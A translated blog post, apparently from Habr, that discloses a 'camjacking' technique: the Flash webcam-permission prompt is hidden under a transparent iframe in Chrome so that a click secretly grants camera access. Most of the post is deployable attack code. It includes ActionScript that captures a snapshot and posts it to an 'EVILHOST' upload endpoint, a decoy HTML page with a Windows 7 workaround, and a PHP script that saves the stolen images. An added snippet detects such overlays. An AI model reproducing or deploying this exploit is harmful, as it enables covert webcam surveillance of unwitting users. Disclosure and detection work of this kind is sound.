
Camjacking as the evolution of Clickjacking, or “Gyulchatay! Open your face!”



In this post, I tried to explain the essence of a new attack (the attack itself is not new, but let me call it that). The bug affects Windows 7, 8 and Mac OS X. We also need Google Chrome and, of course, Flash. The topic touches on the idea of total surveillance, which has been especially popular in recent days.
Interested? Read on.

It was an ordinary night and, as usual, I was poking at some code. I no longer remember which code, but the night played its part. Have you ever wondered whether it is possible to hide the Flash Player security prompt that appears when a Flash file tries to access the webcam or microphone? Such thoughts usually come spontaneously, but why not try to carry out something that wandered so strangely into your head? That is what I thought, too.

Having written a simple page with opacity and a Flash container (the Flash movie requested access to the webcam), I noticed that Firefox 21 and Opera 12.15 either ignored the transparency of the Flash content or simply handled it incorrectly. But IE 10 and Chrome 27.0.1453.110 handled transparency perfectly and allowed text and/or an image to be placed on top of the Flash content. That would undoubtedly come in handy for web designers. But staying on the surface was simply not interesting, and I began to dig deeper, taking the idea of a Clickjacking attack and reworking it to fit my needs, that is, borrowing all the functions “useful” to an attacker.
I chose webcam access (of course, the microphone can be accessed as well, but was that important at the time?).
So, I wrote a simple Flash movie that takes a picture using the webcam and sends it to the server.
I am not an expert in ActionScript, so if you have any complaints, I am ready to make corrections to the code.

package {
    import flash.display.BitmapData;
    import flash.display.Sprite;
    import flash.media.Camera;
    import flash.media.Video;
    import flash.net.*;
    import flash.utils.ByteArray;
    import flash.events.*;

    public class Main extends Sprite {
        private var cam:Camera;
        private var video:Video;
        private var bitmapdata:BitmapData;
        private var ba:ByteArray;
        // upload.php endpoint
        private var url:URLRequest = new URLRequest("http://EVILHOST/upload.php");
        private var wclose:URLRequest = new URLRequest("javascript:alert('Camjacked? Ok. |fil9{06.2013}|');");
        private var loader:URLLoader = new URLLoader();

        public function Main():void {
            run();
        }

        private function run():void {
            cam = Camera.getCamera();
            if (cam != null) { // a camera is present
                cam.addEventListener(ActivityEvent.ACTIVITY, activityHandler);
                video = new Video(640, 480);
                cam.setMode(640, 480, 60); // 60 fps
                video.attachCamera(cam);
            }
        }

        private function activityHandler(event:ActivityEvent):void {
            // take the "snapshot"
            bitmapdata = new BitmapData(video.width, video.height);
            bitmapdata.draw(video);
            ba = PNGEncoder.encode(bitmapdata); // Adobe PNGEncoder
            url.method = URLRequestMethod.POST;
            url.data = ba;
            loader.addEventListener(Event.COMPLETE, on_complete);
            loader.load(url); // send
            function on_complete(e:Event):void {
                navigateToURL(wclose, '_self'); // Alert
            }
            cam.removeEventListener(ActivityEvent.ACTIVITY, activityHandler);
        }
    }
}


Take PNGEncoder.
The FlashDevelop project is here.

Unfortunately, additional tests revealed that IE does not allow interaction with a translucent element, i.e. it is impossible to click in the dialog box.
Since I have Windows 8, the tests under it went off with a bang; on Windows 7, however, the dialog box disappeared (at opacity: 0) only after the Flash object was “selected” with the mouse. But even for this misfortune a “dirty hack” of its own was found (more on that later). It meant giving up the text on top of the Flash object and overlaying a picture on top of it instead.

We have:

1) swf.html:

<html>
<body>
  <object width="270" height="270">
    <param name="movie" value="camjack.swf">
    <embed src="camjack.swf" width="270" height="270"> </embed>
  </object>
</body>
</html>


2) index.html:

<html>
<head>
<script>
var exit = function(){ document.location = 'about:blank' };

// easy hack: are images enabled?
var tryimages = function(){
  return (document.getElementById('imgenabled').height==1 && document.getElementById('imgenabled').width==1)
};

var load = function(){
  // checks: images enabled; Chrome, Windows 7, Windows 8
  if((!tryimages()) || (navigator.userAgent.indexOf('Chrome') == -1)/* || ((navigator.userAgent.indexOf('Windows NT 6.1') == -1) & (navigator.userAgent.indexOf('Windows NT 6.2') == -1))*/)
  { exit() };
  // Windows 7 Chrome hack
  if(navigator.userAgent.indexOf('Windows NT 6.1') != -1){
    // DIRTY HACK (Windows 7)
    setInterval("document.getElementById('ifr').height=1;document.getElementById('ifr').height=291",300);
    setInterval("document.getElementById('ifr').width=1;document.getElementById('ifr').width=291",350);
    setTimeout("document.getElementById('img').width=291",1000);
    setTimeout("document.getElementById('img').height=291",1070); // 70 ms after the width change
  }
};
</script>
<title>Camjacking simple example</title>
<style>
iframe {
  position: absolute;
  opacity: 0.0;
  z-index: 1;
}
</style>
</head>
<body onload='load()'>
<!-- PNG 1x1 -->
<img id='imgenabled' style='display:none' src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAAEnQAABJ0Ad5mH3gAAAAMSURBVBhXY/j//z8ABf4C/qc1gYQAAAAASUVORK5CYII='></img>
<iframe id='ifr' src='./swf.html' width='290' height='290'></iframe>
<img id='img' src='./img.jpg' width='290' height='290'></img>
</body>
</html>


3) img.jpg here

4) upload.php:

<?php
$imgdata = file_get_contents('php://input'); //input raw POST data
$length = 10;
$randomString = substr(str_shuffle("0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"), 0, $length);
$imgname = "./images/".$randomString.".png";
if($imgdata){
    file_put_contents($imgname, $imgdata); //PHP5
};
?>


5) camjack.swf: build it yourself.

6) $ mkdir ./images

Put all this, with love, into the root of the site. Oh, and do not forget to put crossdomain.xml in the root of the site that hosts upload.php.
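
The overlay built by index.html above, seen from the defender's side: an added example (not part of the original post) that flags frames or plugin containers rendered nearly invisible while stacked over visible content. The element records, the 0.1 opacity threshold and the 50% coverage cutoff are assumptions; in a browser the values would come from getComputedStyle() and getBoundingClientRect().

```javascript
// Added example, not from the original post.
// Flags iframe/object/embed elements that are (nearly) invisible but still
// clickable and stacked above a visible element: the layout of index.html.

const OPACITY_THRESHOLD = 0.1; // assumption: below this the user cannot see a prompt
const MIN_COVERAGE = 0.5;      // assumption: share of the frame hidden behind a decoy

function overlapArea(a, b) {
  const w = Math.min(a.x + a.w, b.x + b.w) - Math.max(a.x, b.x);
  const h = Math.min(a.y + a.h, b.y + b.h) - Math.max(a.y, b.y);
  return w > 0 && h > 0 ? w * h : 0;
}

function findHiddenOverlays(elements) {
  const findings = [];
  const risky = elements.filter(e =>
    ['iframe', 'object', 'embed'].includes(e.tag) &&
    e.opacity < OPACITY_THRESHOLD &&
    e.pointerEvents !== 'none'); // the invisible element still receives the click
  for (const frame of risky) {
    for (const other of elements) {
      if (other === frame || other.opacity < OPACITY_THRESHOLD) continue;
      const covered = overlapArea(frame.rect, other.rect) / (frame.rect.w * frame.rect.h);
      if (frame.zIndex > other.zIndex && covered >= MIN_COVERAGE) {
        findings.push({ frame: frame.id, decoy: other.id, covered: Number(covered.toFixed(2)) });
      }
    }
  }
  return findings;
}

// Constructed sample mirroring the page: iframe 'ifr' (opacity 0, z-index 1,
// absolutely positioned) over image 'img' of the same 290x290 size, plus an
// unrelated visible iframe that must not be flagged.
const samplePage = [
  { id: 'ifr', tag: 'iframe', opacity: 0.0, zIndex: 1, pointerEvents: 'auto',
    rect: { x: 8, y: 8, w: 290, h: 290 } },
  { id: 'img', tag: 'img', opacity: 1.0, zIndex: 0, pointerEvents: 'auto',
    rect: { x: 8, y: 8, w: 290, h: 290 } },
  { id: 'ad', tag: 'iframe', opacity: 1.0, zIndex: 0, pointerEvents: 'auto',
    rect: { x: 400, y: 8, w: 300, h: 250 } },
];

console.log(findHiddenOverlays(samplePage));
```
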

After all the dancing around, on Windows 8 it all looked like this (opacity: 0.5):



I launched a small example site (thanks to korowkin). If something does not work, or does work, please let me know in the comments. I checked everything on a couple of computers and am reasonably confident that it works as described above.

Example online: http: // * / *

View images online: http: // * / *

Thank you all, the tests are completed.

And finally, two videos of the code at work.

Windows 7:

http://www.youtube.com/watch?v=hQj6bqTAXKQ

Windows 8:

http://www.youtube.com/watch?v=vuTd481N6Os

P.S. (From the author; feel free to skip): It so happens that after school I am moving to the cultural capital of our immense homeland. On that occasion I am writing the following: if you need a high-quality audit of your project, I can offer you my services. Contacts are in my profile.

UPD: Google has released an update.

Have a nice day!

Source: https://habr.com/ru/post/182706/

